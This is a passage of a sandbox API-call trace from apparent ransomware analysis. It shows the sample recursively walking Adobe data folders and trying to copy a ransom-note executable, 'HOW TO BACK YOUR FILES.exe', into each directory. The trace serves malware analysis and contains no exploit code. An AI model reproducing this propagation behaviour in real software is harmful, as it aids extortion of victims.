lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" [0091.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f4fc8 | out: hHeap=0x2b0000) returned 1 [0091.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0091.591] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned 109 [0091.591] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" [0091.592] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.592] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.592] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.592] GetLastError () returned 0x0 [0091.592] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.592] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.592] CloseHandle (hObject=0x120) returned 1 [0091.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.593] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.593] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.593] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.593] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.593] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM" [0091.593] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e87c0 | out: hHeap=0x2b0000) returned 1 [0091.593] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0091.593] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM") returned 113 [0091.593] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM" [0091.593] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.593] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\adobe\\arm\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.594] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.594] GetLastError () returned 0x0 [0091.594] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.594] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.594] CloseHandle (hObject=0x120) returned 1 [0091.594] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.594] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.594] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.594] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.594] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.594] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0" [0091.595] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0091.595] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0091.595] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned 127 [0091.595] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0" [0091.595] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.595] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\adobe\\arm\\reader_10.0.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.595] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.595] GetLastError () returned 0x0 [0091.595] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.595] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.596] CloseHandle (hObject=0x120) returned 1 [0091.596] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.596] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.596] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x67f06480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x67f06480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.596] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.596] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.596] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0091.596] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0091.596] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0091.596] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned 117 [0091.596] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0091.596] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.596] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.597] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.597] GetLastError () returned 0x0 [0091.597] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.597] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.597] CloseHandle (hObject=0x120) returned 1 [0091.597] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.597] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.597] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.597] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.597] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.598] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0091.598] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0091.598] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0091.598] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned 122 [0091.598] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0091.598] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.598] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.598] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.598] GetLastError () returned 0x0 [0091.598] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.599] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.599] CloseHandle (hObject=0x120) returned 1 [0091.599] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.599] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.599] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.599] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.599] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.599] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" [0091.599] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e87c0 | out: hHeap=0x2b0000) returned 1 [0091.599] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0091.599] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned 132 [0091.599] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" [0091.599] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.599] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\replicate\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.600] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.600] GetLastError () returned 0x0 [0091.600] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.600] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.600] CloseHandle (hObject=0x120) returned 1 [0091.600] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.600] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.600] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.600] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.600] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.601] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0091.601] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e0710 | out: hHeap=0x2b0000) returned 1 [0091.601] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0091.601] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned 141 [0091.601] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0091.601] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.601] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\replicate\\security\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.601] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.601] GetLastError () returned 0x0 [0091.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.602] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.602] CloseHandle (hObject=0x120) returned 1 [0091.602] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.602] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.602] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x680f5660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x680f5660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.602] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.602] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.602] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" [0091.602] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfda8 | out: hHeap=0x2b0000) returned 1 [0091.602] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0091.602] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned 92 [0091.602] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" [0091.602] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.602] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.603] CreateFileW 